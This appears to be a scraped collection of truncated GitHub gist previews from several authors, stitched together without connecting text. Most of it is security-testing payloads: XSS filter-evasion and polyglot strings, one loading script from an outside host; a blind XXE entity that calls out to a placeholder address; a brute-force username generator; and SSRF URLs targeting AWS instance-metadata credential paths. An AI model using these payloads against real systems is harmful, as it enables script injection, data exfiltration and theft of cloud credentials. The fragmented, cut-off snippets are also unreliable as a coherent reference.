sseffa

#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#

# XSS Locator 2
'';!--"<XSS>=&{()}

superkojiman

#!/usr/bin/env python3

'''
NameMash by superkojiman

Generate a list of possible usernames from a person's first and last name. 

https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''

cirocosta

<!DOCTYPE html>
<html>
<head>
	<title>My Iframe</title>
</head>
<body>

<button>Botão</button>

<script type="text/javascript">

staaldraad

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

tuxfight3r

##TCP FLAGS##

Unskilled Attackers Pester Real Security Folks
==============================================
                     TCPDUMP FLAGS
Unskilled =  URG  =  (Not Displayed in Flag Field, Displayed elsewhere) 
Attackers =  ACK  =  (Not Displayed in Flag Field, Displayed elsewhere)
Pester    =  PSH  =  [P] (Push Data)
Real      =  RST  =  [R] (Reset Connection)
Security  =  SYN  =  [S] (Start Connection)

mbohun

$ ./githubapi-get.sh $GITHUBTOKEN /users/mbohun/repos

HTTP/1.1 200 OK
Server: GitHub.com
Date: Wed, 04 Mar 2015 04:30:29 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 155683
Status: 200 OK

averagesecurityguy

# I was testing a web app recently where each POST request updated the session cookie
# and generated a new CSRF token in a hidden input field in the body of the response.
# By default, Burp's Session handling rules will only use the cookie jar for Spider
# and Scanner. I modified the rules to use the cookie jar for Intruder and Repeater
# as well. In addition, Burp will only update the cookie jar from Proxy and Scanner
# so I had to allow Repeater, Spider, and Intruder to update the cookie jar as well.
# This allowed me to use a fresh cookie with each request as required by the app.
#
# To get a fresh CSRF token with each request I had to write an extension. The
# extension processes any responses that it receives from any tool except Proxy and

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

subfuzion

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

BuffaloWill

## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]